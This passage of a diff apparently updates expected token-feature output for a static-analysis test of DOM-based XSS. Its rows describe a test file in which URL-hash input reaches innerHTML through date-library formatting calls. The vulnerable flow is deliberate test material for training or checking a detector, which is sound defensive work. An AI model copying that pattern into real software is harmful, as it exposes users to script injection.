autogenerated/Xss/DomBasedXss/dates.js:59:57:59:61 | luxon | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:66 | luxon.date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:66 | luxon.date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:66 | luxon.date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:66 | luxon.date | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:66 | luxon.date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:68 | exceptional return of luxon.date() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:68 | exceptional return of luxon.date() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:68 | exceptional return of luxon.date() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:68 | exceptional return of luxon.date() | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:68 | exceptional return of luxon.date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:59:57:59:68 | luxon.date() | CalleeFlexibleAccessPath | luxon.endOfDay | | autogenerated/Xss/DomBasedXss/dates.js:59:57:59:68 | luxon.date() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:59:57:59:68 | luxon.date() | calleeImports | @date-io/luxon | @@ -13321,6 +99019,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:59:57:59:68 | luxon.date() | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:59:57:59:68 | luxon.date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:59:57:59:68 | luxon.date() | receiverName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:59:63:59:66 | date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:63:59:66 | date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:63:59:66 | date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:63:59:66 | date | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:63:59:66 | date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:71:59:78 | toFormat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:71:59:78 | toFormat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:71:59:78 | toFormat | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:71:59:78 | toFormat | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:71:59:78 | toFormat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:59:80:59:84 | taint | CalleeFlexibleAccessPath | luxon.endOfDay().toFormat | | autogenerated/Xss/DomBasedXss/dates.js:59:80:59:84 | taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:59:80:59:84 | taint | calleeImports | @date-io/luxon | @@ -13329,12 +99037,129 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:59:80:59:84 | taint | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | | autogenerated/Xss/DomBasedXss/dates.js:59:80:59:84 | taint | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:59:80:59:84 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:15 | dayjs | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:15 | dayjs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:15 | dayjs | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:15 | dayjs | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:15 | dayjs | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:36 | dayjs | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:36 | dayjs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:36 | dayjs | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:36 | dayjs | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:36 | dayjs | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:36 | dayjs = ... apter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:36 | dayjs = ... apter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:36 | dayjs = ... apter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:36 | dayjs = ... apter() | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:60:11:60:36 | dayjs = ... apter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:60:19:60:36 | exceptional return of new DayJSAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:60:19:60:36 | exceptional return of new DayJSAdapter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:60:19:60:36 | exceptional return of new DayJSAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:60:19:60:36 | exceptional return of new DayJSAdapter() | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:60:19:60:36 | exceptional return of new DayJSAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:60:19:60:36 | new DayJSAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:60:19:60:36 | new DayJSAdapter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:60:19:60:36 | new DayJSAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:60:19:60:36 | new DayJSAdapter() | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:60:19:60:36 | new DayJSAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:60:23:60:34 | DayJSAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:60:23:60:34 | DayJSAdapter | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:60:23:60:34 | DayJSAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:60:23:60:34 | DayJSAdapter | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:60:23:60:34 | DayJSAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:12 | document | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:12 | document | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:17 | document.body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:17 | document.body | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:27 | documen ... nerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:27 | documen ... nerHTML | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:88 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:88 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:88 | documen ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:88 | documen ... aint)}` | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:5:61:88 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:14:61:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:14:61:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:14:61:17 | body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:14:61:17 | body | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:14:61:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:19:61:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:19:61:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:19:61:27 | innerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:19:61:27 | innerHTML | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:19:61:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:61:31:61:88 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:61:31:61:88 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:61:31:61:88 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:61:31:61:88 | `Time i ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | | autogenerated/Xss/DomBasedXss/dates.js:61:31:61:88 | `Time i ... aint)}` | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:61:31:61:88 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:32:61:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:32:61:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:32:61:39 | Time is | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:32:61:39 | Time is | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:32:61:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:32:61:39 | Time is | stringConcatenatedWith | -endpoint- dayjs.setHours().format() | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:46 | dayjs | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:46 | dayjs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:46 | dayjs | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:46 | dayjs | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:46 | dayjs | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:55 | dayjs.setHours | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:55 | dayjs.setHours | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:55 | dayjs.setHours | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:55 | dayjs.setHours | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:55 | dayjs.setHours | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:72 | dayjs.s ... e(), 4) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:72 | dayjs.s ... e(), 4) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:72 | dayjs.s ... e(), 4) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:72 | dayjs.s ... e(), 4) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:72 | dayjs.s ... e(), 4) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:72 | exceptional return of dayjs.s ... e(), 4) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:72 | exceptional return of dayjs.s ... e(), 4) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:72 | exceptional return of dayjs.s ... e(), 4) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:72 | exceptional return of dayjs.s ... e(), 4) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:72 | exceptional return of dayjs.s ... e(), 4) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:79 | dayjs.s ... .format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:79 | dayjs.s ... .format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:79 | dayjs.s ... .format | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:79 | dayjs.s ... .format | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:79 | dayjs.s ... .format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:86 | dayjs.s ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:86 | dayjs.s ... (taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:86 | dayjs.s ... (taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:86 | dayjs.s ... (taint) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:86 | dayjs.s ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:86 | dayjs.s ... (taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:86 | exceptional return of dayjs.s ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:86 | exceptional return of dayjs.s ... (taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:86 | exceptional return of dayjs.s ... (taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:86 | exceptional return of dayjs.s ... (taint) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:42:61:86 | exceptional return of dayjs.s ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:48:61:55 | setHours | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:48:61:55 | setHours | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:48:61:55 | setHours | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:48:61:55 | setHours | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:48:61:55 | setHours | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:61 | dayjs | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:61 | dayjs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:61 | dayjs | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:61 | dayjs | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:61 | dayjs | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:66 | dayjs.date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:66 | dayjs.date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:61:57:61:66 | dayjs.date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment 